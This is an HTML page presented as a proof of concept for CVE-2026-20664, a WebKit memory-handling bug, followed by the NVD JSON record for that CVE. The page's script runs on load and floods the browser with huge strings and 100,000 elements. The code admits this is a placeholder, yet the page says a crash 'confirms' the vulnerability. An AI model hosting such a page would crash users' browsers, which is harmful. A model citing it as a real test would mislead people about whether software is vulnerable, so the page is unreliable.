CVE-2026-20664

<!-- PoC Concept for CVE-2026-20664 Description: Maliciously crafted web content designed to trigger memory handling issues. Usage: Host this file and open it in a vulnerable version of Safari or WebKit. --> <!DOCTYPE html> <html> <head> <title>CVE-2026-20664 PoC</title> <script type="text/javascript"> function triggerCrash() { // Simulate memory pressure or invalid object handling // This is a placeholder representing the specific malicious pattern try { var pattern = new Array(1000000).join('A'); var maliciousObj = document.createElement('object'); // Manipulation that leads to improper memory handling maliciousObj.data = "data:text/html," + pattern; document.body.appendChild(maliciousObj); // Loop to intensify memory usage for(var i=0; i<100000; i++) { var div = document.createElement('div'); div.innerHTML = pattern; document.body.appendChild(div); } } catch (e) { console.log("Exception caught: " + e); } } window.onload = function() { triggerCrash(); }; </script> </head> <body> <h1>CVE-2026-20664 Memory Handling Test Page</h1> <p>If the browser crashes, the vulnerability is confirmed.</p> </body> </html>

{"cve": {"id": "CVE-2026-20664", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:04.947", "lastModified": "2026-03-25T20:53:38.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The issue was addressed with improved memory handling. This issue is fixed in Safari 26.4, iOS 26.4 and iPadOS 26.4, macOS Tahoe 26.4, visionOS 26.4. Processing maliciously crafted web content may lead to an unexpected process crash."}, {"lang": "es", "value": "El problema se abordó con un manejo de memoria mejorado. Este problema está solucionado en Safari 26.4, iOS 26.4 y iPadOS 26.4, macOS Tahoe 26.4, visionOS 26.4. El procesamiento de contenido web diseñado maliciosamente puede provocar una caída inesperada del proceso."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "993386B4-0570-414F-B4A6-3E65F5704903"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "F813DB63-2B55-4E0B-9073-5465C65F69D6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "01612D13-BE5B-43F8-B53E-5BF57F2A5B0C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.4", "matchCriteriaId": "6CF848CD-25D4-4371-BEF3-1ACCE47AD81F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "113B9705-BFF0-4357-B1AB-F57052F32361"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126792", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126799", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126800", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}